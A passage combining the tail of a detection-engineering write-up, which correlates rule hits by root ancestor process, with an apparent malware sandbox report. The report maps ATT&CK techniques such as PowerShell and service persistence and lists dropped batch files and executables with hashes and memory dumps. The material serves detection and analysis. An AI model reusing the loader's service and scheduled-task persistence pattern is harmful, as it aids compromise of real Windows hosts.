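        print(root, basename(by_pid[root][2]), names)
```

The `sc.exe query wuauserv` control branch fires nothing, and a real fleet will produce single-rule hits (an administrator disabling standby, a deployment tool creating a service) that stay below the threshold; the point of correlating by root ancestor is that the loader here lights up nine rules under one parent within seconds.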
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- System Services (2): Service Execution (2)
- Scheduled Task/Job (1)
Persistence
- Create or Modify System Process (2): Windows Service (2)
- Scheduled Task/Job (1)
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 556084f2c6d459c116a69d6fedcc4105
  SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
  SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
  SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 95e1c8db6eb5be60fa7c5f7ca36bfaed
  SHA1: 5b23544fe29ddd6f07852b4ff8971a5bf6c0fdf9
  SHA256: 3b3202f973ef9c0f477b91a022fd535a21e8b444279d8be34fcd16fccfe68a18
  SHA512: de221bd9c8728434d7a463d7bc5123c5bc45362224b8e312abef60e2e89197cd9b77839df07069d663a483233d3395e9cd8b414d68c3b857eb9171d6d8a195db
- C:\Users\Admin\AppData\Local\Temp\51C9.tmp\51CA.tmp\51CB.bat
  Filesize: 6KB
  MD5: 45f6bf2d3c1c47e445439b805929aae8
  SHA1: 9d2ba518dd058559bc1d690019bbed79c7cd5f85
  SHA256: ca7484221dd9645e4608a8195965d941955cfb0f9a373d0870cfd244302ae0fa
  SHA512: 902eb3e38b0be7d795f17a779d0231d0d168fbb8d4ce32b48ba3774a6be9929016b213e9b0082b55e8ac4d2fadadce3184ba8c30f8a025003fec8c8b8e496c64
- C:\Users\Admin\AppData\Local\Temp\52C3.tmp\52C4.tmp\52C5.bat
  Filesize: 1KB
  MD5: 2b49f09f8e1785bf2e5c79d0f2bc7389
  SHA1: 05d68482ab1db17e11fef25fae270c3b784000ae
  SHA256: 706536e5077fcb4e5e4dd2f77d40f492e7ab6b12065cdc0b450fdd483f436279
  SHA512: ba8cc161086caa5beb691191ff10f1408e68be79a075d0a653716df497cec762b7767783a0dc91bcba2f260df0fa9ff77e9cf982a364135a18c281e50564bc0a
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t3n5pkwo.hmk.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe
  Filesize: 94KB
  MD5: 40208a80f2b2155185d8a5bac4b9c367
  SHA1: d7bf694f6046be8d6a882c86df12c1a35e26ab60
  SHA256: cf879d5a689376a47310ceb1b95167ccd18ab2073a1356b8d9cecbf04141ae16
  SHA512: 5ff32150c9e62261732c36b4bf2c4f84c58b120b72652b2c22a7591865dd6babbfb741fb75177acd845b072a4ea2a594960a894a2bca4f220c2f897ccd692621
- C:\Users\Admin\AppData\Roaming\xaa22oqf.pc41.exe
  Filesize: 355KB
  MD5: c93d65bc0ed7ee88d266b4be759301f8
  SHA1: 8c0c415ba824737c61904676e7132094f5710099
  SHA256: f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f
  SHA512: 7a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1
- C:\Users\Admin\AppData\Roaming\xaa22oqf.pc42.exe
  Filesize: 5.2MB
  MD5: f55fc8c32bee8f7b2253298f0a0012ba
  SHA1: 574c7a8f3eb378c03f58bc96252769296b20970e
  SHA256: cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9
  SHA512: c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a
- C:\Users\Admin\AppData\Roaming\xaa22oqf.pc43.exe
  Filesize: 89KB
  MD5: a3b2fcf0c05bb385115894d38c2e6c44
  SHA1: 32cf50911381bbec1dad6aec06c2a741bd5d8213
  SHA256: dbfe02373aa15cc50414561f2bf486b69a11cd9cd50217608c1d18d17e72cae1
  SHA512: fe58a5d238ac39a269897c176de08d0ad2726bb2ea1636f0d383a1484263e43d0878f0b5f4ebee8a10f3db8e72ab9b36b861e29a6a9b6429fa3e51ec7546dee2
- memory/380-129-0x000001F44AAD0000-0x000001F44AAFB000-memory.dmp (Filesize 172KB)
- memory/380-130-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp (Filesize 64KB)
- memory/616-122-0x000001BC1CE50000-0x000001BC1CE7B000-memory.dmp (Filesize 172KB)
- memory/616-119-0x000001BC1CE00000-0x000001BC1CE24000-memory.dmp (Filesize 144KB)
- memory/616-123-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp (Filesize 64KB)
- memory/664-125-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp (Filesize 64KB)
- memory/664-121-0x0000021BA1560000-0x0000021BA158B000-memory.dmp (Filesize 172KB)
- memory/744-138-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp (Filesize 64KB)
- memory/744-137-0x0000025C8EF60000-0x0000025C8EF8B000-memory.dmp (Filesize 172KB)
- memory/952-133-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp (Filesize 64KB)
- memory/952-132-0x00000262969D0000-0x00000262969FB000-memory.dmp (Filesize 172KB)
- memory/1048-140-0x0000020045D10000-0x0000020045D3B000-memory.dmp (Filesize 172KB)
- memory/1048-141-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp (Filesize 64KB)
- memory/1076-147-0x0000010D4B990000-0x0000010D4B9BB000-memory.dmp (Filesize 172KB)
- memory/1076-148-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp (Filesize 64KB)
- memory/1084-154-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp (Filesize 64KB)
- memory/1084-153-0x0000025B4EF40000-0x0000025B4EF6B000-memory.dmp (Filesize 172KB)
- memory/1224-150-0x0000020CC1B60000-0x0000020CC1B8B000-memory.dmp (Filesize 172KB)
- memory/1224-151-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp (Filesize 64KB)
- memory/1256-157-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp (Filesize 64KB)
- memory/1256-156-0x000002DB0CEA0000-0x000002DB0CECB000-memory.dmp (Filesize 172KB)
- memory/1344-160-0x000001992BFD0000-0x000001992BFFB000-memory.dmp (Filesize 172KB)
- memory/1344-161-0x00007FFB83C50000-0x00007FFB83C60000-memory.dmp (Filesize 64KB)
- memory/2380-90-0x0000000000820000-0x0000000000829000-memory.dmp (Filesize 36KB)
- memory/2380-96-0x0000000076DC0000-0x0000000076FD5000-memory.dmp (Filesize 2.1MB)
- memory/2380-93-0x0000000002700000-0x0000000002B00000-memory.dmp (Filesize 4.0MB)
- memory/2380-94-0x00007FFBC3BD0000-0x00007FFBC3DC5000-memory.dmp (Filesize 2.0MB)
- memory/2552-17-0x00007FFBA5580000-0x00007FFBA6041000-memory.dmp (Filesize 10.8MB)
- memory/2552-61-0x00007FFBA5580000-0x00007FFBA6041000-memory.dmp (Filesize 10.8MB)
- memory/2552-16-0x00007FFBA5580000-0x00007FFBA6041000-memory.dmp (Filesize 10.8MB)
- memory/2552-15-0x00007FFBA5580000-0x00007FFBA6041000-memory.dmp (Filesize 10.8MB)
- memory/2552-12-0x000001DFEAC30000-0x000001DFEAC52000-memory.dmp (Filesize 136KB)
- memory/2552-14-0x00007FFBA5580000-0x00007FFBA6041000-memory.dmp (Filesize 10.8MB)
- memory/2552-13-0x00007FFBA5580000-0x00007FFBA6041000-memory.dmp (Filesize 10.8MB)
- memory/2832-110-0x0000000140000000-0x000000014002B000-memory.dmp (Filesize 172KB)
- memory/2832-107-0x0000000140000000-0x000000014002B000-memory.dmp (Filesize 172KB)
- memory/2832-108-0x0000000140000000-0x000000014002B000-memory.dmp (Filesize 172KB)
- memory/2832-112-0x0000000140000000-0x000000014002B000-memory.dmp (Filesize 172KB)
- memory/2832-116-0x0000000140000000-0x000000014002B000-memory.dmp (Filesize 172KB)
- memory/2832-114-0x00007FFBC38F0000-0x00007FFBC39AE000-memory.dmp (Filesize 760KB)
- memory/2832-109-0x0000000140000000-0x000000014002B000-memory.dmp (Filesize 172KB)
- memory/2832-113-0x00007FFBC3BD0000-0x00007FFBC3DC5000-memory.dmp (Filesize 2.0MB)
- memory/4052-0-0x00007FFBA5583000-0x00007FFBA5585000-memory.dmp (Filesize 8KB)
- memory/4052-1-0x00000000002E0000-0x00000000002E8000-memory.dmp (Filesize 32KB)
- memory/5776-91-0x0000000000400000-0x000000000046D000-memory.dmp (Filesize 436KB)
- memory/5776-85-0x00000000039F0000-0x0000000003DF0000-memory.dmp (Filesize 4.0MB)
- memory/5776-86-0x00000000039F0000-0x0000000003DF0000-memory.dmp (Filesize 4.0MB)
- memory/5776-87-0x00007FFBC3BD0000-0x00007FFBC3DC5000-memory.dmp (Filesize 2.0MB)
- memory/5776-89-0x0000000076DC0000-0x0000000076FD5000-memory.dmp (Filesize 2.1MB)
- memory/5776-42-0x0000000000400000-0x000000000046D000-memory.dmp (Filesize 436KB)